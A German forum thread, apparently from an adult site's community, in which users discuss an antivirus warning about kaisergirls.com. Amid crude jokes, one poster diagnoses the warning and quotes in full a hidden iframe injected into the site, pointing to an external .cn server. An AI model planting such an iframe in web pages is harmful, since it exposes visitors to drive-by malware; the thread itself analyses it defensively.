Virus auf der HP von den Kaisergirls?
Mein GData Internet Security 2009 sperrt seit ein paar Tagen die Kaisergirls.com Seite, wei er meint, dass sie infizierten Code enthält.

Wenn ich hier die drektverlinkten Gallerien anklicke gibt es aber kein Problem.

Vielleicht ist es falscher Alarm aber ich dachte ich sag mal bescheid.

Gruß

hf20
Zitieren
Mein Kapsersky - aktualisiert per "jetzt" gibt keinerlei Alarm.
Zitieren
Der GData arbeitet mit 2 Engines. Die erste ist der Kaspersky, der nichts findet. Die zweite Engine schlägt Alarm.

loewe
Entwickelt wurde der Sex für die Reproduktion. Aber er hat sich zum reinen Vergnügen verselbstständigt.
Christiaan Neethling Barnard
Zitieren
Also einen Virus einfangen und krank werden könnte ich bei Kaisergirls höchstens, weil Barby kein AV mehr anbietet, sonst kann ich da auch nix finden.

master1, der gegen Viren einfach Gummis nutzt Laut Lach
Nur wer schon alle 3 Löcher gefüllt hat, weiß wovon er spricht Big Grin
Zitieren
[Bild: th_33906_Unbenannt_122_487lo.jpg]

Ohne Kommentar.
Zitieren
hölenforscher20 schrieb:[Bild: th_33906_Unbenannt_122_487lo.jpg]

Ohne Kommentar.


das ist kein Virus, sondern eine nicht ganz so toll programierte Seite...

imo besteht da keine Gefahr.

Im Normalfall hat da einfach der Programierer geschlampt und etwas unkonformes geproggt.
Zitieren
Die haben ganz unten auf der Seite eine versteckten iframe eingebettet. Im Moment liefert der nur ein leeres Ergebnis zurück - befindet sich aber auf einen anderen Server, das kann sich also recht fix ändern.

Aus meiner Sicht ist die Warnung des Scanners technisch richtig. Die Seite hat ein potenzielles Problem.

[noparse]
<iframe src="http://shopmoviefestival.cn:8080/index.php" width=180 height=167 style="visibility: hidden"></iframe>
[/noparse]
Gruß
lw
Für jedes Problem gibt es eine Lösung, die einfach, klar und falsch ist.
(Henry Louis Mencken)
Zitieren